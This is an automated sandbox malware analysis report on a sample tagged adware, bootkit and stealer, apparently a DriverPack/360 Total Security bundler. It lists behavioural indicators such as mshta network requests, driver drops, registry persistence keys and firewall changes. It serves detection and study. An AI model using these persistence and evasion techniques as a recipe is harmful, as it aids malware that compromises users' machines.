Malware Analysis Report

2025-01-18 22:27

Sample ID 240503-vad9fsbc7y
Target e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25
SHA256 e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25
Tags
adware bootkit discovery evasion persistence spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25

Threat Level: Known bad

The file e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25 was found to be: Known bad.

Malicious Activity Summary

adware bootkit discovery evasion persistence spyware stealer trojan upx

Sets service image path in registry

Downloads MZ/PE file

Drops file in Drivers directory

Modifies Windows Firewall

Modifies Installed Components in the registry

Blocklisted process makes network request

Modifies system executable filetype association

UPX packed file

Unexpected DNS network traffic destination

Executes dropped EXE

Registers COM server for autorun

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Installs/modifies Browser Helper Object

Writes to the Master Boot Record (MBR)

Enumerates connected drives

Drops desktop.ini file(s)

Maps connected drives based on registry

Checks installed software on the system

Checks whether UAC is enabled

Checks for any installed AV software in registry

Adds Run key to start application

Checks system information in the registry

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Modifies registry class

Uses Volume Shadow Copy service COM API

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Checks processor information in registry

Runs .reg file with regedit

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Runs net.exe

Download via BitsAdmin

Script User-Agent

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-03 16:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-03 16:46

Reported

2024-05-03 17:02

Platform

win7-20240221-en

Max time kernel

862s

Max time network

848s

Command Line

C:\Windows\Explorer.EXE

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\360fsflt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\system32\drivers\360Camera64.sys C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Windows\system32\drivers\360AntiHacker64.sys C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Windows\system32\drivers\360AvFlt.sys C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Windows\system32\drivers\BAPIDRV64.SYS C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Windows\system32\drivers\360netmon.sys C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File created C:\Windows\system32\drivers\360Box64.sys C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
File opened for modification C:\Windows\system32\drivers\360fsflt.sys C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}\ComponentID = ".NETFramework" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227}\Locale = "*" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0}\Locale = "*" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0}\ComponentID = "M2833941" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}\Locale C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589}\Locale = "*" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589}\ComponentID = "S867460" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F}\Locale = "*" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F}\Version = "1,1,4322" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227}\Version = "1,1,4322" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0}\Version = "1,1,4322" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589}\IsInstalled = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A} C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589}\ = "Microsoft .NET Framework 1.1 Service Pack 1 (KB867460)" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F}\ComponentID = "M979906" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227}\ = "Microsoft .NET Framework 1.1 Security Update (KB2698023)" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227}\ComponentID = "M2698023" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ = "RootsUpdate" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\IsInstalled = "1" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ComponentID = "Windows Roots Update" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}\ = ".NET Framework" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F}\IsInstalled = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0}\IsInstalled = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Version = "41,0,2195,0" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}\Version = "1,0,4322,1" C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Locale = "*" C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589}\Version = "1,1,4322" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F}\ = "Microsoft .NET Framework 1.1 Security Update (KB979906)" C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{2A3320D6-C805-4280-B423-B665BDE33D8F} C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{411EDCF7-755D-414E-A74B-3DCD6583F589} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227}\IsInstalled = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0}\ = "Microsoft .NET Framework 1.1 Security Update (KB2833941)" C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{C0F0DCDC-99EA-4405-BDAE-CACABD3D2DF0} C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{8F736E10-8E5C-4399-A532-D0C00A406227} C:\Windows\system32\msiexec.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360netmon\ImagePath = "system32\\DRIVERS\\360netmon.sys" C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360Camera\ImagePath = "System32\\Drivers\\360Camera64.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360AntiHacker\ImagePath = "System32\\Drivers\\360AntiHacker64.sys" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\BAPIDRV\ImagePath = "system32\\DRIVERS\\BAPIDRV64.sys" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360Box64\ImagePath = "system32\\DRIVERS\\360Box64.sys" C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\1714755241_0\360TS_Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Opera\36.0.2130.80\opera.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe N/A
